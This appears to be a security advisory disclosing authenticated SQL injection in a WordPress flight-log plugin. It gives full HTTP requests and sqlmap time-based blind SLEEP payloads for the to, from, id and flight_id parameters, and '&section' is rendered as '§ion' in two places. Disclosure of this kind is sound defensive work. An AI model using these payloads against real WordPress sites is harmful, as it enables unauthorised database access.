The plugin does not sanitise, validate or escape various POST parameters before using them a SQL statement, leading to SQL injections exploitable by editor and administrator users
1. to and from parameters (Editor Level) Tools -> Flightlog -> add a record POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1 Proxy-Connection: keep-alive Content-Length: 116 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://172.28.128.50 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [editor+] Host: 172.28.128.50 section=flight&dt=&from=1&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add Sample SQLMap Output sqlmap identified the following injection point(s) with a total of 467 HTTP(s) requests: --- Parameter: to (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: section=flight&dt=&from=1&to=1 AND (SELECT 1824 FROM (SELECT(SLEEP(5)))Eims)&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add Parameter: from (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: section=flight&dt=&from=1 AND (SELECT 9760 FROM (SELECT(SLEEP(5)))zCHx)&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add --- 2. id parameter vulnerable (Admin Level) Steps - Settings -> Flightlog - add an airport - update the airport Sample Request POST http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu HTTP/1.1 Proxy-Connection: keep-alive Content-Length: 84 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://172.28.128.50 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Referer: http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [admin] Host: 172.28.128.50 section=airports&id=2&name=a&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update SQLMap Output Parameter: id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: section=airports&id=2 AND (SELECT 1421 FROM (SELECT(SLEEP(5)))GfMZ)&name=bhopal&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update 3. flight_id parameter vulnerable (Editor Level) Steps - Login as editor - tools -> FlightLog - Edit a flight log entry and add a remark Vulnerable Request POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1 Proxy-Connection: keep-alive Content-Length: 52 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://172.28.128.50 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [editor+] Host: 172.28.128.50 flight_id=3045§ion=rem&remark=Test&Submit=Update SQLMap Sample Output Parameter: flight_id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: flight_id=3045 AND (SELECT 1932 FROM (SELECT(SLEEP(5)))XEdw)§ion=rem&remark=Test&Submit=Update
Shreya Pohekar of Codevigilant Project
Yes
2021-05-19 (about 1 years ago)
2021-05-19 (about 1 years ago)
2021-05-20 (about 1 years ago)